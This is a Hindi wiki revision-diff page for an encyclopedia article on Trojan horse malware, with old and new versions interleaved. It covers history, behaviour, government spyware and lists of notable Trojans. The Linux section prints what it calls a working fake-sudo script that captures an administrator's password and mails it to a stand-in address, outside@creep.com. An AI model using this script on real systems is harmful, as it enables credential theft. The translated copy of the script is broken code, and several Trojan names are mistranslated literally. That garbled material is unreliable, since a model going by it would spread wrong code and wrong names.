ट्रोजन हॉर्स (कंप्यूटिंग): Difference between revisions

From Vigyanwiki
No edit summary
No edit summary
 
(71 intermediate revisions by 4 users not shown)
Line 1: Line 1:
{{Short description|Type of malware}}
{{Short description|Type of malware}}
{{Use mdy dates|date=May 2018}}
 
{{Computer hacking}}
{{Computer hacking}}
{{Information security}}
{{Information security}}
[[कम्प्यूटिंग]] में, एक ट्रोजन हॉर्स<!-- Upper case is INTENTIONAL here, please see the "Capitalization" section, and the Talk page --> <!-- Lower case is INTENTIONAL here
[[कम्प्यूटिंग|संगणना]] में, एक ट्रोजन हॉर्स एक [[मैलवेयर]] है जो उपयोगकर्ताओं को एक मानक प्रोग्राम के रूप में खुद को छिपाकर अपने वास्तविक उद्देश्य से गलत सूचना देता है। यह शब्द भ्रामक [[ट्रोजन हॉर्स]] की [[मैलवेयर|प्राचीन]] [[मैलवेयर|ग्रीक]] कहानी से लिया गया है ,जिसके कारण [[ट्रॉय]] शहर का पतन हुआ।<ref>{{Cite conference| publisher = DTIC Document| last = Landwehr| first = Carl E.| author2=Alan R. Bull |author3=John P. McDermott |author4=William S. Choi| title = कंप्यूटर प्रोग्राम सुरक्षा दोषों का एक वर्गीकरण, उदाहरण के साथ| url = https://apps.dtic.mil/sti/pdfs/ADA465587.pdf|archive-url=https://web.archive.org/web/20130408133230/http://www.dtic.mil/cgi-bin/GetTRDoc?AD=ADA465587| url-status = live
--> कोई भी ऐसा [[मैलवेयर]] है जो उपयोगकर्ताओं को उसके वास्तविक इरादे से भ्रमित करता है। यह शब्द भ्रामक [[ट्रोजन हॉर्स]] की प्राचीन ग्रीक कहानी से लिया गया है ,जिसके कारण [[ट्रॉय]] शहर का पतन हुआ।<ref>{{Cite conference| publisher = DTIC Document| last = Landwehr| first = Carl E.| author2=Alan R. Bull |author3=John P. McDermott |author4=William S. Choi| title = कंप्यूटर प्रोग्राम सुरक्षा दोषों का एक वर्गीकरण, उदाहरण के साथ| url = https://apps.dtic.mil/sti/pdfs/ADA465587.pdf|archive-url=https://web.archive.org/web/20130408133230/http://www.dtic.mil/cgi-bin/GetTRDoc?AD=ADA465587| url-status = live
|archive-date = April 8, 2013| year = 1993| access-date = 2012-04-05|citeseerx=10.1.1.35.997}}</ref><ref>{{Cite web
|archive-date = April 8, 2013| year = 1993| access-date = 2012-04-05|citeseerx=10.1.1.35.997}}</ref><ref>{{Cite web
|title = ट्रोजन हॉर्स परिभाषा| access-date = 2012-04-05| url = http://www.techterms.com/definition/trojanhorse
|title = ट्रोजन हॉर्स परिभाषा| access-date = 2012-04-05| url = http://www.techterms.com/definition/trojanhorse
}}</ref><ref>{{Cite news| title = ट्रोजन हॉर्स| work = Webopedia| access-date = 2012-04-05|url=http://www.webopedia.com/TERM/T/Trojan_horse.html}}</ref><ref>{{Cite web| title = ट्रोजन हॉर्स क्या है? - Whatis.com से परिभाषा| access-date = 2012-04-05| url = http://searchsecurity.techtarget.com/definition/Trojan-horse
}}</ref><ref>{{Cite news| title = ट्रोजन हॉर्स| work = Webopedia| access-date = 2012-04-05|url=http://www.webopedia.com/TERM/T/Trojan_horse.html}}</ref><ref>{{Cite web| title = ट्रोजन हॉर्स क्या है? - Whatis.com से परिभाषा| access-date = 2012-04-05| url = http://searchsecurity.techtarget.com/definition/Trojan-horse
}}</ref><ref>{{Cite web| title = ट्रोजन हॉर्स: [एमआईटी-हैकर-टर्न-एनएसए-स्पूक डैन एडवर्ड्स द्वारा गढ़ा गया] एन।| access-date = 2012-04-05| url = http://www.anvari.org/fortune/Miscellaneous_Collections/291162_trojan-horse-coined-by-mit-hacker-turned-nsa-spook-dan-edwards-n.html}}</ref>
}}</ref><ref>{{Cite web| title = ट्रोजन हॉर्स: [एमआईटी-हैकर-टर्न-एनएसए-स्पूक डैन एडवर्ड्स द्वारा गढ़ा गया] एन।| access-date = 2012-04-05| url = http://www.anvari.org/fortune/Miscellaneous_Collections/291162_trojan-horse-coined-by-mit-hacker-turned-nsa-spook-dan-edwards-n.html}}</ref>
ट्रोजन आमतौर पर [[सोशल इंजीनियरिंग (सुरक्षा)]] के किसी रूप से फैलते हैं; उदाहरण के लिए, जहां एक उपयोगकर्ता को अहानिकर दिखने के लिए एक [[ईमेल]] अटैचमेंट निष्पादित करने में धोखा दिया जाता है (उदाहरण के लिए, एक नियमित फॉर्म भरने के लिए), या सोशल मीडिया पर या कहीं और किसी नकली विज्ञापन पर क्लिक करके। यद्यपि उनका आयभार कुछ भी हो सकता है, कई आधुनिक रूप [[पिछले दरवाजे (कंप्यूटिंग)]] के रूप में कार्य करते हैं, एक नियंत्रक से संपर्क करते हैं जो प्रभावित कंप्यूटर तक अनधिकृत पहुंच प्राप्त कर सकते हैं।<ref>{{cite web |title=वायरस, वर्म और ट्रोजन के बीच अंतर|url=https://knowledge.broadcom.com/external/article?legacyId=tech98539 |website=Symantec Security Center |publisher=Broadcom Inc. |access-date=2020-03-29 |archive-url=https://archive.today/20130819122702/http://www.symantec.com/business/support/index?page=content&id=TECH98539#selection-3435.1-3585.1 |archive-date=2013-08-19 |url-status=live}}</ref>{{cbignore|bot=InternetArchiveBot}} [[रैंसमवेयर]] हमले अक्सर ट्रोजन का उपयोग करके किए जाते हैं।
ट्रोजन आमतौर पर [[सोशल इंजीनियरिंग (सुरक्षा)|सामाजिक अभियान्त्रिकी]] के किसी न किसी रूप से फैलते हैं; उदाहरण के लिए, जहाँ एक उपयोगकर्ता को सहज दिखने के लिए एक ईमेल संबद्धता निष्पादित करने में धोखा दिया जाता है (उदाहरण के लिए, एक नियमित फॉर्म भरने के लिए), या सामाजिक संचार माध्यम पर या कहीं और किसी नकली विज्ञापन पर क्लिक करके। हालांकि उनका आयभार कुछ भी हो सकता है, कई आधुनिक रूप से पिछले दरवाजे के रूप में कार्य करते हैं ,एक नियंत्रक से संपर्क करते हैं जो प्रभावित परिकलक पर अनाधिकृत पहुंच प्राप्त कर सकते हैं।<ref>{{cite web |title=वायरस, वर्म और ट्रोजन के बीच अंतर|url=https://knowledge.broadcom.com/external/article?legacyId=tech98539 |website=Symantec Security Center |publisher=Broadcom Inc. |access-date=2020-03-29 |archive-url=https://archive.today/20130819122702/http://www.symantec.com/business/support/index?page=content&id=TECH98539#selection-3435.1-3585.1 |archive-date=2013-08-19 |url-status=live}}</ref> [[रैंसमवेयर]] हमले अक्सर ट्रोजन का उपयोग करके किए जाते हैं।  


[[कंप्यूटर वायरस]] और [[कंप्यूटर कीड़ा]] के विपरीत, ट्रोजन आमतौर पर खुद को अन्य फाइलों में नवीनता करने का प्रयास नहीं करते हैं या अन्यथा स्वयं को प्रचारित नहीं करते हैं।<ref>{{Cite web| title = वायरस-एल/कंप.वायरस अक्सर पूछे जाने वाले प्रश्न (एफएक्यू) v2.00 (प्रश्न बी3: ट्रोजन हॉर्स क्या है?)| url = http://faqs.cs.uu.nl/na-dir/computer-virus/faq.html| date = October 9, 1995| access-date = September 16, 2019| archive-date = August 5, 2020
[[कंप्यूटर वायरस|परिकलक वायरस]] और [[वर्म]] के विपरीत, ट्रोजन आमतौर पर खुद को अन्य फाइलों में अन्तःक्षेप करने की कोशिश नहीं करते हैं या अन्यथा खुद को प्रचारित नहीं करते हैं।<ref>{{Cite web| title = वायरस-एल/कंप.वायरस अक्सर पूछे जाने वाले प्रश्न (एफएक्यू) v2.00 (प्रश्न बी3: ट्रोजन हॉर्स क्या है?)| url = http://faqs.cs.uu.nl/na-dir/computer-virus/faq.html| date = October 9, 1995| access-date = September 16, 2019| archive-date = August 5, 2020
|archive-url = https://web.archive.org/web/20200805171304/https://faqs.cs.uu.nl/na-dir/computer-virus/faq.html
|archive-url = https://web.archive.org/web/20200805171304/https://faqs.cs.uu.nl/na-dir/computer-virus/faq.html
|url-status = dead}}</ref>
|url-status = dead}}</ref>
== शब्द का प्रयोग ==
यह स्पष्ट नहीं है कि कब और कहां अवधारणा, और इसके लिए यह शब्द पहली बार इस्तेमाल किया गया था, लेकिन 1971 तक पहले [[यूनिक्स]] नियमावली ने माना कि इसके पाठक दोनों को जानते थे:<ref>{{cite web |last1=Thompson |first1=Ken | last2=Ritchie | first2=Dennis M. |title=यूनिक्स प्रोग्रामर मैनुअल, 3 नवम्बर 1971|url=https://www.bell-labs.com/usr/dmr/www/man21.pdf |access-date=28 March 2020}}</ref>


{{quotation |साथ ही, कोई भी अटल-उपभोगकर्ता-आईडी बिट ऑन के साथ दस्तावेज के स्वामी को नहीं बदल सकता है, अन्यथा कोई अन्य की फाइलों का दुरुपयोग करने में सक्षम ट्रोजन हॉर्स बना सकता है।}}
एक और प्रारंभिक संदर्भ 1974 में [[मॉलटिक्स]] परिकलक प्रणाली में अतिसंवेदनशीलता विश्लेषण पर अमेरिकी वायु सेना की  सम्बन्ध में है।<ref name="Multics">{{Citation|last1 = Karger| first1 = P.A.| last2 = Schell| first2 = R.R.| title = Multics Security Evaluation: Vulnerability Analysis , ESD-TR-74-193| volume = II| journal  = HQ Electronic Systems Division: Hanscom AFB, MA| url = http://csrc.nist.gov/publications/history/karg74.pdf}}</ref>


== शब्द का प्रयोग ==
इसे [[केन थॉम्पसन]] द्वारा 1983 के अपने ट्यूरिंग पुरस्कार स्वीकृति व्याख्यान "भरोसेमंद विश्वास पर विचार" में लोकप्रिय बनाया गया था,<ref>{{cite journal|title = ट्रस्टिंग ट्रस्ट पर प्रतिबिंब|author = Ken Thompson|journal = Commun. ACM  
यह स्पष्ट नहीं है कि कब और कहाँ अवधारणा, और इसके लिए यह शब्द पहली बार इस्तेमाल किया गया था, लेकिन 1971 तक पहले [[यूनिक्स]] मैनुअल ने मान लिया था कि इसके पाठक दोनों को जानते हैं:<ref>{{cite web |last1=Thompson |first1=Ken | last2=Ritchie | first2=Dennis M. |title=यूनिक्स प्रोग्रामर मैनुअल, 3 नवम्बर 1971|url=https://www.bell-labs.com/usr/dmr/www/man21.pdf |access-date=28 March 2020}}</ref>
|volume= 27|number = 8|pages =  761–763|date = 1984|url = https://dl.acm.org/ft_gateway.cfm?id=1283940&type=pdf|doi=10.1145/358198.358210|doi-access = free}}.</ref> उपशीर्षक: किस हद तक एक बयान पर भरोसा करना चाहिए कि एक कार्यक्रम ट्रोजन हॉर्स से मुक्त है? सॉफ्टवेयर लिखने वाले लोगों पर भरोसा करना शायद ज्यादा जरूरी है। उन्होंने उल्लेख किया कि वे [[मॉलटिक्स]] की सुरक्षा पर एक प्रतिवेदन से ट्रोजन के संभावित अस्तित्व के बारे में जानते थे<ref>{{Citation|author1 = Paul A. Karger| author2 = Roger R. Schell
 
{{quotation |Also, one may not change the owner of a file with the set—user—ID bit on, otherwise one could create Trojan Horses able to misuse other’s files.}}
एक और प्रारंभिक संदर्भ 1974 में [[मॉलटिक्स]] कंप्यूटर सिस्टम में भेद्यता के विश्लेषण पर अमेरिकी वायु सेना की रिपोर्ट में है।<ref name="Multics">{{Citation|last1 = Karger| first1 = P.A.| last2 = Schell| first2 = R.R.| title = Multics Security Evaluation: Vulnerability Analysis , ESD-TR-74-193| volume = II| journal  = HQ Electronic Systems Division: Hanscom AFB, MA| url = http://csrc.nist.gov/publications/history/karg74.pdf}}</ref>
इसे [[केन थॉम्पसन]] द्वारा 1983 के अपने ट्यूरिंग अवार्ड स्वीकृति व्याख्यान रिफ्लेक्शंस ऑन ट्रस्टिंग ट्रस्ट में लोकप्रिय बनाया गया था।<ref>{{cite journal|title = ट्रस्टिंग ट्रस्ट पर प्रतिबिंब|author = Ken Thompson|journal = Commun. ACM  
|volume= 27|number = 8|pages =  761–763|date = 1984|url = https://dl.acm.org/ft_gateway.cfm?id=1283940&type=pdf|doi=10.1145/358198.358210|doi-access = free}}.</ref> सबटाइटल: किस हद तक एक बयान पर भरोसा करना चाहिए कि एक प्रोग्राम ट्रोजन हॉर्स से मुक्त है? सॉफ्टवेयर लिखने वाले लोगों पर भरोसा करना शायद ज्यादा जरूरी है। उन्होंने उल्लेख किया कि वे मल्टिक्स की सुरक्षा पर एक रिपोर्ट से ट्रोजन के संभावित अस्तित्व के बारे में जानते थे।<ref>{{Citation|author1 = Paul A. Karger| author2 = Roger R. Schell
|title = Thirty Years Later: Lessons from the Multics Security Evaluation|journal = ACSAC| date = 2002|pages = 119–126
|title = Thirty Years Later: Lessons from the Multics Security Evaluation|journal = ACSAC| date = 2002|pages = 119–126
|url= https://www.acsac.org/2002/papers/classic-multics.pdf}}</ref><ref>Karger et Schell wrote that Thompson added this reference in a later version of his Turing conference: {{Citation|author = Ken Thompson|title = On Trusting Trust.
|url= https://www.acsac.org/2002/papers/classic-multics.pdf}}</ref><ref>Karger et Schell wrote that Thompson added this reference in a later version of his Turing conference: {{Citation|author = Ken Thompson|title = On Trusting Trust.
|journal = Unix Review|date = November 1989|volume = 7|number = 11|pages = 70–74}}</ref>
|journal = Unix Review|date = November 1989|volume = 7|number = 11|pages = 70–74}}</ref>  
== व्यवहार ==
एक बार इंस्टॉल हो जाने पर, ट्रोजन कई प्रकार के दुर्भावनापूर्ण कार्य कर सकते हैं। कई इंटरनेट पर एक या एक से अधिक आदेश और नियंत्रण (C2) सर्वर से संपर्क करते हैं और निर्देश का इंतजार करते हैं। चूंकि व्यक्तिगत ट्रोजन आमतौर पर इस संचार के लिए पोर्ट के एक विशिष्ट सेट का उपयोग करते हैं, इसलिए उनका पता लगाना अपेक्षाकृत सरल हो सकता है। इसके अलावा, दुर्भावनापूर्ण कार्रवाई के लिए एक प्रतिनिधि के रूप में इसका उपयोग करते हुए, अन्य मैलवेयर ट्रोजन को संभावित रूप से "अधिकार" कर सकते हैं।


जर्मन भाषी देशों में, सरकार द्वारा उपयोग किए जाने वाले या बनाए गए [[स्पाइवेयर]] को कभी-कभी गोववेयर कहा जाता है। गोववेयर आमतौर पर एक ट्रोजन सॉफ़्टवेयर है जिसका उपयोग लक्ष्य कंप्यूटर से संचार को बाधित करने के लिए किया जाता है। स्विट्ज़रलैंड और जर्मनी जैसे कुछ देशों में इस तरह के सॉफ़्टवेयर के उपयोग को नियंत्रित करने वाला एक कानूनी ढांचा है।<ref name="cupa">Basil Cupa, [http://www.zora.uzh.ch/81157/1/Cupa_Living_in_Surveillance_Societies_2012.pdf Trojan Horse Resurrected: On the Legality of the Use of Government Spyware (Govware)], LISS 2013, pp. 419–428</ref><ref>{{cite web|url=http://www.ejpd.admin.ch/content/ejpd/de/home/themen/sicherheit/ueberwachung_des_post-/faq_vuepf.faq_3.html
|title=अधिकतर पूछे जाने वाले सवाल| publisher=Federal Department of Justice and Police
|url-status=dead| archive-url=https://web.archive.org/web/20130506102113/http://www.ejpd.admin.ch/content/ejpd/de/home/themen/sicherheit/ueberwachung_des_post-/faq_vuepf.faq_3.html| archive-date=May 6, 2013}}</ref> गोववेयर ट्रोजन के उदाहरणों में स्विस [[स्पाइवेयर|मिनीपैंजर और मेगापैंजर]] <ref name="tech">{{cite web|last1=Dunn|first1=John|title=स्विस कोडर सरकारी जासूस ट्रोजन का प्रचार करता है|url=http://news.techworld.com/security/3200593/swiss-coder-publicises-government-spy-trojan/|website=[[International Data Group|TechWorld]] |access-date=10 January 2021|archive-url=https://archive.today/20140126115729/http://news.techworld.com/security/3200593/swiss-coder-publicises-government-spy-trojan/|archive-date=26 January 2014|date=27 August 2009|url-status=dead}}{{cbignore|bot=InternetArchiveBot}}</ref> और [[स्पाइवेयर|जर्मन "राज्य ट्रोजन"]] [[स्पाइवेयर|उपनाम R2D2]] शामिल है।<ref name="cupa" /> जर्मन गोववेयर आम जनता के लिए अज्ञात सुरक्षा अंतराल का शोषण करके और अन्य अनुप्रयोगों के माध्यम से कूट किए जाने से पहले स्मार्टफोन डेटा तक पहुंच बनाकर काम करता है। <ref>{{Cite web |title = जर्मन संघीय पुलिस फोन एन्क्रिप्शन से बचने के लिए ट्रोजन वायरस का उपयोग करती है|url = http://www.dw.com/en/german-federal-police-use-trojan-virus-to-evade-phone-encryption/a-42328466| website = [[Deutsche Welle|DW]] | access-date = 2018-04-14}}</ref>


== व्यवहार ==
हैकर्स के बीच [[बॉटनेट]] की लोकप्रियता और विज्ञापन सेवाओं की उपलब्धता के कारण, ट्रोजन अधिक आम होते जा रहे हैं जो लेखकों को अपने उपयोगकर्ताओं की गोपनीयता का उल्लंघन करने की अनुमति देती हैं।[[BitDefender|बिटडिफेंडर]] द्वारा जनवरी से जून 2009 तक किए गए एक सर्वेक्षण के अनुसार, "ट्रोजन-प्रकार के मैलवेयर बढ़ रहे हैं, जो दुनिया में पाए गए वैश्विक मैलवेयर का 83% हिस्सा हैै"। ट्रोजन का [[वर्म]] से संबंध है, क्योंकि वे वर्म की मदद से फैलते हैं और उनके साथ इंटरनेट पर यात्रा करते हैं।<ref>{{cite web |title=बिटडिफेंडर मालवेयर और स्पैम सर्वेक्षण ई-खतरे को ऑनलाइन व्यवहार प्रवृत्तियों के अनुकूल पाता है|url=http://news.bitdefender.com/NW1094-en--BitDefender-Malware-and-Spam-Survey-finds-E-Threats-Adapting-to-Online-Behavioral-Trends.html |website=[[Bitdefender|BitDefender]] |access-date=2020-03-27 |archive-url=https://web.archive.org/web/20090808080907/http://news.bitdefender.com/NW1094-en--BitDefender-Malware-and-Spam-Survey-finds-E-Threats-Adapting-to-Online-Behavioral-Trends.html |archive-date=2009-08-08 |url-status=dead}}</ref> बिटडिफेंडर ने कहा है कि लगभग 15% परिकलक एक बॉटनेट के सदस्य हैं, आमतौर पर जो ट्रोजन संक्रमणों द्वारा भर्ती किए जाते हैं।<ref>{{cite web
एक बार इंस्टॉल हो जाने पर, ट्रोजन कई प्रकार के दुर्भावनापूर्ण कार्य कर सकते हैं। कई इंटरनेट पर एक या एक से अधिक Botnet#Command and control (C2) सर्वर से संपर्क करते हैं और निर्देश का इंतजार करते हैं। चूंकि व्यक्तिगत ट्रोजन आमतौर पर इस संचार के लिए बंदरगाहों के एक विशिष्ट सेट का उपयोग करते हैं, इसलिए उनका पता लगाना अपेक्षाकृत सरल हो सकता है। इसके अलावा, दुर्भावनापूर्ण कार्रवाई के लिए एक प्रॉक्सी के रूप में इसका उपयोग करते हुए, अन्य मैलवेयर संभावित रूप से ट्रोजन पर कब्जा कर सकते हैं।<ref name="Crapanzano">{{cite report |last1=Crapanzano |first1=Jamie |title=सबसेवन का विखंडन, पसंद का ट्रोजन हॉर्स|date=2003 |url=http://www.sans.org/reading_room/whitepapers/malicious/deconstructing_subseven_the_trojan_horse_of_choice_953 |publisher=[[SANS Institute]] |access-date=2021-05-10}}</ref>
जर्मन भाषी देशों में, सरकार द्वारा उपयोग किए जाने वाले या बनाए गए [[स्पाइवेयर]] को कभी-कभी गोववेयर कहा जाता है। Govware आमतौर पर एक ट्रोजन सॉफ़्टवेयर है जिसका उपयोग लक्ष्य कंप्यूटर से संचार को बाधित करने के लिए किया जाता है। स्विट्ज़रलैंड और जर्मनी जैसे कुछ देशों में इस तरह के सॉफ़्टवेयर के उपयोग को नियंत्रित करने वाला एक कानूनी ढांचा है।<ref name="cupa">Basil Cupa, [http://www.zora.uzh.ch/81157/1/Cupa_Living_in_Surveillance_Societies_2012.pdf Trojan Horse Resurrected: On the Legality of the Use of Government Spyware (Govware)], LISS 2013, pp. 419–428</ref><ref>{{cite web|url=http://www.ejpd.admin.ch/content/ejpd/de/home/themen/sicherheit/ueberwachung_des_post-/faq_vuepf.faq_3.html
|title=अधिकतर पूछे जाने वाले सवाल| publisher=Federal Department of Justice and Police
|url-status=dead| archive-url=https://web.archive.org/web/20130506102113/http://www.ejpd.admin.ch/content/ejpd/de/home/themen/sicherheit/ueberwachung_des_post-/faq_vuepf.faq_3.html| archive-date=May 6, 2013}}</ref> गोववेयर ट्रोजन के उदाहरणों में स्विस मिनी पैंजर और मेगा पैंजर शामिल हैं<ref name="tech">{{cite web|last1=Dunn|first1=John|title=स्विस कोडर सरकारी जासूस ट्रोजन का प्रचार करता है|url=http://news.techworld.com/security/3200593/swiss-coder-publicises-government-spy-trojan/|website=[[International Data Group|TechWorld]] |access-date=10 January 2021|archive-url=https://archive.today/20140126115729/http://news.techworld.com/security/3200593/swiss-coder-publicises-government-spy-trojan/|archive-date=26 January 2014|date=27 August 2009|url-status=dead}}{{cbignore|bot=InternetArchiveBot}}</ref> और स्टैट्रोजेनर | जर्मन राज्य ट्रोजन उपनाम R2D2।<ref name="cupa"/>जर्मन गोववेयर आम जनता के लिए अज्ञात सुरक्षा अंतराल का शोषण करके और अन्य अनुप्रयोगों के माध्यम से एन्क्रिप्ट किए जाने से पहले स्मार्टफोन डेटा तक पहुंच बनाकर काम करता है।<ref>{{Cite web |title = जर्मन संघीय पुलिस फोन एन्क्रिप्शन से बचने के लिए ट्रोजन वायरस का उपयोग करती है|url = http://www.dw.com/en/german-federal-police-use-trojan-virus-to-evade-phone-encryption/a-42328466| website = [[Deutsche Welle|DW]] | access-date = 2018-04-14}}</ref>
हैकर्स के बीच [[बोटनेट]] की लोकप्रियता और विज्ञापन सेवाओं की उपलब्धता के कारण, जो लेखकों को अपने उपयोगकर्ताओं की गोपनीयता का उल्लंघन करने की अनुमति देती हैं, ट्रोजन अधिक आम होते जा रहे हैं। [[BitDefender]] द्वारा जनवरी से जून 2009 तक किए गए एक सर्वेक्षण के अनुसार, ट्रोजन-प्रकार के मैलवेयर बढ़ रहे हैं, जो दुनिया में पाए गए वैश्विक मैलवेयर का 83% हिस्सा है। ट्रोजन का कीड़ों के साथ एक रिश्ता है, क्योंकि वे कीड़े द्वारा दी गई मदद से फैलते हैं और उनके साथ इंटरनेट पर यात्रा करते हैं।<ref>{{cite web |title=बिटडिफेंडर मालवेयर और स्पैम सर्वेक्षण ई-खतरे को ऑनलाइन व्यवहार प्रवृत्तियों के अनुकूल पाता है|url=http://news.bitdefender.com/NW1094-en--BitDefender-Malware-and-Spam-Survey-finds-E-Threats-Adapting-to-Online-Behavioral-Trends.html |website=[[Bitdefender|BitDefender]] |access-date=2020-03-27 |archive-url=https://web.archive.org/web/20090808080907/http://news.bitdefender.com/NW1094-en--BitDefender-Malware-and-Spam-Survey-finds-E-Threats-Adapting-to-Online-Behavioral-Trends.html |archive-date=2009-08-08 |url-status=dead}}</ref> बिटडिफेंडर ने कहा है कि लगभग 15% कंप्यूटर एक बॉटनेट के सदस्य हैं, आमतौर पर ट्रोजन संक्रमण द्वारा भर्ती किए जाते हैं।<ref>{{cite web
  |last=Datta
  |last=Datta
  |first=Ganesh
  |first=Ganesh
Line 44: Line 43:
  |access-date=2020-03-27
  |access-date=2020-03-27
  }}</ref>
  }}</ref>
== लिनक्स उदाहरण ==
== लिनक्स उदाहरण ==
ट्रोजन हॉर्स एक [[कंप्यूटर प्रोग्राम]] है जो कुछ स्पष्ट कार्य करने का दावा करता है, फिर भी निष्पादन पर यह उपयोगकर्ता की सुरक्षा से समझौता करता है।<ref name="uss_42">{{cite book
ट्रोजन हॉर्स एक ऐसी [[कंप्यूटर वायरस|योजना]] है जो कुछ स्पष्ट कार्य करने का दावा करता है, फिर भी निष्पादन पर यह उपयोगकर्ता की सुरक्षा से समझौता करता है।<ref name="uss_42">{{cite book
   | last1 = Wood
   | last1 = Wood
   | first1 = Patrick H.
   | first1 = Patrick H.
Line 56: Line 53:
   | page = 42
   | page = 42
   | isbn = 0-8104-6267-2
   | isbn = 0-8104-6267-2
}}</ref> एक आसान प्रोग्राम Linux [[sudo]] कमांड का नया संस्करण है। आदेश को तब सार्वजनिक रूप से लिखने योग्य निर्देशिका में कॉपी किया जाता है <code>/tmp</code>. यदि कोई व्यवस्थापक उस निर्देशिका में होता है और निष्पादित करता है <code>sudo</code>, तो ट्रोजन हॉर्स को निष्पादित किया जा सकता है। यहाँ एक कार्यशील संस्करण है:
}}</ref> एक आसान योजना लिनक्स [[sudo|सुडो]] कमांड का नया संस्करण है। आदेश को तब सार्वजनिक रूप से लिखने योग्य निर्देशिका जैसे <code>/tmp</code>में प्रतिलिपि बनाया जाता है। यदि कोई प्रशासक उस निर्देशिका में होता है और [[सुडो]] को निष्पादित करता है, तो ट्रोजन हॉर्स को निष्पादित किया जा सकता है। यहाँ एक कार्यशील संस्करण है:
 
:
<वाक्यविन्यास प्रकाश लैंग = श>
# sudo
:
# ----
# सुडो
# ----
# Turn off the character echo to the screen.
 
stty -echo
# कैरेक्टर इको को स्क्रीन पर बंद करें।
stty -गूंज
/bin/echo -n "Password for `whoami`: "
 
read x
/bin/echo -n `whoami` के लिए पासवर्ड:
/bin/echo ""
एक्स पढ़ें
/बिन/गूंज
# Turn back on the c8haracter echo.
 
stty echo
# कैरेक्टर इको को वापस चालू करें।
stty गूंज
echo $x | mail -s "`whoami` password" outside@creep.com
 
sleep 1
प्रतिध्वनि $x | mail -s `whoami` पासवर्ड @creep.com के बाहर
echo Sorry.
नींद 1
rm $0
गूंज क्षमा करें।
आरएम $ 0
exit 0
 
[[कमांड लाइन|आदेश प्रणाली]] आधारित ट्रोजन हॉर्सेस को रोकने के लिए, पथ में प्रवेश= परिवेश चर अंत में स्थित होना चाहिए। उदाहरण के लिए: <code>PATH=/usr/local/bin:/usr/bin:.</code>.
बाहर निकलें 0
</वाक्यविन्यास हाइलाइट>
 
[[कमांड लाइन]] आधारित ट्रोजन हॉर्स को रोकने के लिए, सेट करें <code>.</code> में प्रवेश <code>PATH=</code> पर्यावरण चर पूंछ के अंत में स्थित होना चाहिए। उदाहरण के लिए: <code>PATH=/usr/local/bin:/usr/bin:.</code>.


== उल्लेखनीय उदाहरण ==
== उल्लेखनीय उदाहरण ==


===निजी और सरकारी ===
===निजी और सरकारी ===
* एएनओएम - एफबीआई
* [[फिनफिशर|एएनओएम]] - एफबीआई
* कैओस कंप्यूटर क्लब#Staatstrojaner|0zapftis / r2d2 StaatsTrojaner – DigiTask
* [[फिनफिशर|0ज़ाफटिस / आरटूडीटू स्टैंटस ट्रोजनर]] – DigiTask
* [[डार्ककॉमेट]] - सीआईए / एनएसए
* [[डार्ककॉमेट]] - सीआईए / एनएसए
* [[फिनफिशर]] - लेंच आईटी समाधान / गामा इंटरनेशनल
* [[फिनफिशर]] - लेंच आईटी समाधान / गामा अंतर्राष्ट्रीय
* हैकिंग टीम# उत्पाद और क्षमताएं | दा विंची / गैलीलियो आरसीएस - हैकिंग टीम
* [[दाविंसी|दाविंसी /]] [[गैलीलियो]] [[आरसीएस]] - हैकिंग टीम
* [[जादू लालटेन (सॉफ्टवेयर)]] - एफबीआई
* [[जादू लालटेन (सॉफ्टवेयर)|मैजिक लालटेन]] - एफबीआई
* [[2020 यूनाइटेड स्टेट्स फेडरल गवर्नमेंट डेटा ब्रीच]] - फॉरेन इंटेलिजेंस सर्विस (रूस)[[आरामदायक भालू]] (संदिग्ध)
* [[2020 यूनाइटेड स्टेट्स फेडरल गवर्नमेंट डेटा ब्रीच|सनबर्स्ट-एसबीआर]]/[[आरामदायक भालू]] (संदिग्ध)
* जरूरत के हिसाब से एक्सेस ऑपरेशंस#क्वांटम अटैक|टीएओ क्वांटम/फॉक्सैसिड - एनएसए
* [[टीएओ]] [[क्वांटम]]/[[फॉक्सैसिड]] - एनएसए
* [[योद्धा गौरव]] - जीसीएचक्यू
* [[योद्धा गौरव]] - जीसीएचक्यू


=== सार्वजनिक रूप से उपलब्ध ===
=== सार्वजनिक रूप से उपलब्ध ===
* ईजीएबीटीआर - 1980 के दशक के अंत में
* [[ईजीएबीटीआर]] - 1980 के दशक के अंत में
* [[नेटबस]] - 1998 (प्रकाशित)<ref>{{cite report |last1=Seth |first1=Kulakow |title="क्या यह अभी भी एक ट्रोजन हॉर्स या वास्तविक वैध रिमोट कंट्रोल एडमिनिस्ट्रेशन टूल है?"|url=https://www.sans.org/reading-room/whitepapers/malicious/netbus-21-trojan-horse-actual-valid-remote-control-administration-tool-103 |publisher=[[SANS Institute]] |date=1998 |access-date=2021-05-10}}</ref>
* [[नेटबस]] - 1998 (प्रकाशित)<ref>{{cite report |last1=Seth |first1=Kulakow |title="क्या यह अभी भी एक ट्रोजन हॉर्स या वास्तविक वैध रिमोट कंट्रोल एडमिनिस्ट्रेशन टूल है?"|url=https://www.sans.org/reading-room/whitepapers/malicious/netbus-21-trojan-horse-actual-valid-remote-control-administration-tool-103 |publisher=[[SANS Institute]] |date=1998 |access-date=2021-05-10}}</ref>
* मोबमैन द्वारा [[प्रभात]] - 1999 (प्रकाशित)
* मोबमैन द्वारा [[प्रभात|उप7]] - 1999 (प्रकाशित)
* [[पीछे का छिद्र]] - 1998 (प्रकाशित)
* [[पीछे का छिद्र]] - 1998 (प्रकाशित)
* बीस्ट (ट्रोजन हॉर्स) - 2002 (प्रकाशित)
* [[असभ्य]] [[व्यक्ति]] - 2002 (प्रकाशित)
* बिफ्रोस्ट (ट्रोजन हॉर्स) - 2004 (प्रकाशित)
* [[बिफ्रोस्ट]] [[ट्रोजन]] - 2004 (प्रकाशित)
* डार्ककॉमेट - 2008-2012 (प्रकाशित)
* [[डार्ककॉमेट]] - 2008-2012 (प्रकाशित)
* [[ब्लैकहोल शोषण किट]] - 2012 (प्रकाशित)
* [[ब्लैकहोल शोषण किट]] - 2012 (प्रकाशित)
* घोस्ट आरएटी - 2009 (प्रकाशित)
* [[घोस्ट]] [[आरएटी]] - 2009 (प्रकाशित)
* मिनीपैंजर और मेगापैंजर - 2009 (प्रकाशित)<ref>{{Cite web|url=https://sourceforge.net/projects/mega-panzer/|title=मेगा पैंजर|website=SourceForge}}</ref><ref>{{Cite web|url=https://sourceforge.net/projects/mini-panzer/|title=मिनी टैंक|website=SourceForge}}</ref>
